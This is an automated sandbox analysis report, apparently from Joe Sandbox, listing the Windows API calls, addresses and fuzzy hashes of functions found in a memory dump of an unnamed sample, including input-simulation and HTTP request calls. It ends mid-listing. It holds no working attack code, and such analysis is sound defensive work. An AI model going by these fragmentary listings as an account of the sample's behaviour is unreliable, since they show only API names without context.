                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426640281-0
                                                                                                                        • Opcode ID: a82f6c04cf9d1eeffc36bfc1726369327893a5665810f018f064f2a7df9dd582
                                                                                                                        • Instruction ID: 97a69d59402f930c253271cbe0c31ffbb2876eba8c1c86019b77c27a9d6fb486
                                                                                                                        • Opcode Fuzzy Hash: a82f6c04cf9d1eeffc36bfc1726369327893a5665810f018f064f2a7df9dd582
                                                                                                                        • Instruction Fuzzy Hash: CD81A071904745CFDB24CF69C8806E9BBB0EF49334B28465ED4A7AB3D1CBB49806CB64
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DD4A7D
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4A91
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00DD4A98
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AA7
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD4AB9
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AD2
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AE4
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B29
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B3E
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 12665fa976eb1d471c95687576976a78d2b0f38c6b7c8e1b8ff87a04d6bf7ea6
                                                                                                                        • Instruction ID: 20687d33c0a34b5d7072f8c9873591287daca9e051910a8dded9fa9d7190c648
                                                                                                                        • Opcode Fuzzy Hash: 12665fa976eb1d471c95687576976a78d2b0f38c6b7c8e1b8ff87a04d6bf7ea6
                                                                                                                        • Instruction Fuzzy Hash: 5A31D171204304AFDB159F66DC85BAA77ADAB50356F19841BFA04E7290C7B4ED488F20
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00E0EC32
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E0EC49
                                                                                                                        • GetWindowDC.USER32(?), ref: 00E0EC55
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00E0EC64
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00E0EC76
                                                                                                                        • GetSysColor.USER32(00000005), ref: 00E0EC94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 272304278-0
                                                                                                                        • Opcode ID: 45c2ddf35ded7d2152e5fe642d1e92a6570bbb2bcd17bdf66a4a1eb02f544421
                                                                                                                        • Instruction ID: a3d27d5b9f1ca6986a9838e48a5722c45cdaae19d05e7fe817b6b3d894ed32ab
                                                                                                                        • Opcode Fuzzy Hash: 45c2ddf35ded7d2152e5fe642d1e92a6570bbb2bcd17bdf66a4a1eb02f544421
                                                                                                                        • Instruction Fuzzy Hash: E0216D31504204FFEB21AF75EC48BE97B75EB05325F108625FA26B51E2DB310945DF21
                                                                                                                        APIs
                                                                                                                        • EnumChildWindows.USER32(?,00DCDD46), ref: 00DCDC86
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                        • Opcode ID: 8fce18e9e159098e5e484321fa0dc8d91d2a4020a1136fd5e40be5f7d729eaf7
                                                                                                                        • Instruction ID: f3c70a7f5701829b53a577d643bdeea68177821691c57b6434f89eca2888fb39
                                                                                                                        • Opcode Fuzzy Hash: 8fce18e9e159098e5e484321fa0dc8d91d2a4020a1136fd5e40be5f7d729eaf7
                                                                                                                        • Instruction Fuzzy Hash: B3919370900507AACB08DF64C882FE9FB76FF19340F58852DE99AA7151DB30A959CBB0
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D945F0
                                                                                                                        • CoUninitialize.COMBASE ref: 00D94695
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00D947BD
                                                                                                                        • DestroyWindow.USER32(?), ref: 00E05936
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00E0599D
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E059CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: 38333b13aa7ed17900124a64cd9ebb0cb12da90b598727209512c770f16780cb
                                                                                                                        • Instruction ID: e35e7a4abe80f36aee027d1d8b89215638fac6e9f9cf72511e62f4aa29145286
                                                                                                                        • Opcode Fuzzy Hash: 38333b13aa7ed17900124a64cd9ebb0cb12da90b598727209512c770f16780cb
                                                                                                                        • Instruction Fuzzy Hash: 0F915B35601602DFCB19EF24C895EA9F3A4FF15304F5442A9E41AA72A2DB30AD5ACF70
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00DAC2D2
                                                                                                                          • Part of subcall function 00DAC697: GetClientRect.USER32(?,?), ref: 00DAC6C0
                                                                                                                          • Part of subcall function 00DAC697: GetWindowRect.USER32(?,?), ref: 00DAC701
                                                                                                                          • Part of subcall function 00DAC697: ScreenToClient.USER32(?,?), ref: 00DAC729
                                                                                                                        • GetDC.USER32 ref: 00E0E006
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E0E019
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00E0E027
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00E0E03C
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00E0E044
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E0E0CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                        • Opcode ID: d165e19a860b162fd426cd5daed0bd4bf70e23935b5e9d18c092f05d7e023e71
                                                                                                                        • Instruction ID: d36c542aa81b1aad4b20ddb42e56a8d5bfd6341197b88e61af4cb85225884676
                                                                                                                        • Opcode Fuzzy Hash: d165e19a860b162fd426cd5daed0bd4bf70e23935b5e9d18c092f05d7e023e71
                                                                                                                        • Instruction Fuzzy Hash: B071F331500209DFCF258FA4CC80AEA7BB5FF49324F18A675ED956A2E6C7318C85DB61
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DE4C5E
                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DE4C8A
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00DE4CCC
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DE4CE1
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE4CEE
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DE4D1E
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00DE4D65
                                                                                                                          • Part of subcall function 00DE56A9: GetLastError.KERNEL32(?,?,00DE4A2B,00000000,00000000,00000001), ref: 00DE56BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                        • Opcode ID: f3f09ed55add0bda21decedd849c207796ec8c50385ce066d90ef73115e07ec7
                                                                                                                        • Instruction ID: c0712da51fb74edc4cfbf70e89bc20c02fded49ac26c29b451d4b8e02b452d7f
                                                                                                                        • Opcode Fuzzy Hash: f3f09ed55add0bda21decedd849c207796ec8c50385ce066d90ef73115e07ec7
                                                                                                                        • Instruction Fuzzy Hash: 75416DB1501658BFEB12AF62CC89FFB77ACEF08354F14811AFA01AA195D774D9448BB0
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E2DBF0), ref: 00DEBBA1
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E2DBF0), ref: 00DEBBD5
                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DEBD33
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00DEBD5D
                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DEBEAD
                                                                                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 00DEBEF7
                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00DEBF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 793797124-0
                                                                                                                        • Opcode ID: e1fa83137d7b77280d440a26ebf7bea780747e62560de3f96d669b93add8683a
                                                                                                                        • Instruction ID: 6f01e8b7efbf084e7435ccbef41542a87f38fb0782e7f12ff38712fee0798e3d
                                                                                                                        • Opcode Fuzzy Hash: e1fa83137d7b77280d440a26ebf7bea780747e62560de3f96d669b93add8683a
                                                                                                                        • Instruction Fuzzy Hash: 72F10A75A00109EFCF14EFA5C884EAEB7B9FF89714F148499F905AB250DB31AE45CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D94954,00000000), ref: 00D94A23
                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DAB85B), ref: 00DAB926
                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DAB85B,00000000,?,?,00DAAF1E,?,?), ref: 00DAB9BD
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00E0E775
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00E0E7EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2402799130-0
                                                                                                                        • Opcode ID: c88f192753000532789bb0b224449b097d6774aa84ab8c2ccc91f7a8ece2dc56
                                                                                                                        • Instruction ID: 98bf338e6a9716621ec6900333ebe24bc10dc389b20dca1ff6679f74f4bc092e
                                                                                                                        • Opcode Fuzzy Hash: c88f192753000532789bb0b224449b097d6774aa84ab8c2ccc91f7a8ece2dc56
                                                                                                                        • Instruction Fuzzy Hash: 6561C030100701CFDB399F26DC88B26B7F5FF46326F18492AE186666B1C771A896CF60
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DFB204
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: 4d686521afed5b83252a23733f25b84a6a29d35d4e2850e0e20d994f0e8a0855
                                                                                                                        • Instruction ID: 9bafec9c544ad5d558a0e7656379bb069613a4674934342e817592a48db256d1
                                                                                                                        • Opcode Fuzzy Hash: 4d686521afed5b83252a23733f25b84a6a29d35d4e2850e0e20d994f0e8a0855
                                                                                                                        • Instruction Fuzzy Hash: 3C51913054421CBEEB249F29CC85BBE3BA5EB06334F29C513FB55E61A1C771E9548A70
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E0E9EA
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0EA0B
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E0EA20
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E0EA3D
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E0EA64
                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00E0EA6F
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0EA8C
                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00E0EA97
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3992029641-0
                                                                                                                        • Opcode ID: 164583f449381d98f7ca293de05323094a7b8af8ec4f95f030337d290617de7d
                                                                                                                        • Instruction ID: dfc4a0c9a77da2de13f352048ac86359ec39b31a90419dc8f31bb9c8bf6bca66
                                                                                                                        • Opcode Fuzzy Hash: 164583f449381d98f7ca293de05323094a7b8af8ec4f95f030337d290617de7d
                                                                                                                        • Instruction Fuzzy Hash: A3516870A00709AFDB24CF69CC81BAA7BB5FB49354F144A29F946A72D0D770EC84DB60
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00DAF737
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00DAF77E
                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00E0EB55
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00E0EBC1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 2787cc3761280fc33c5eba8361d08522d42483e38519e14aa8558dc3444f9f75
                                                                                                                        • Instruction ID: b443b843c06b20373986b5c7c1eb910d8efc06d7726e2c18fa2e520f2b49b9c4
                                                                                                                        • Opcode Fuzzy Hash: 2787cc3761280fc33c5eba8361d08522d42483e38519e14aa8558dc3444f9f75
                                                                                                                        • Instruction Fuzzy Hash: D341EC302086809EDB395B798CC8B667B95AB47306F6C5CFDE087625A1C770E885DB31
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCE158
                                                                                                                          • Part of subcall function 00DCE138: GetCurrentThreadId.KERNEL32 ref: 00DCE15F
                                                                                                                          • Part of subcall function 00DCE138: AttachThreadInput.USER32(00000000,?,00DCCDFB,?,00000001), ref: 00DCE166
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE06
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DCCE23
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00DCCE26
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE2F
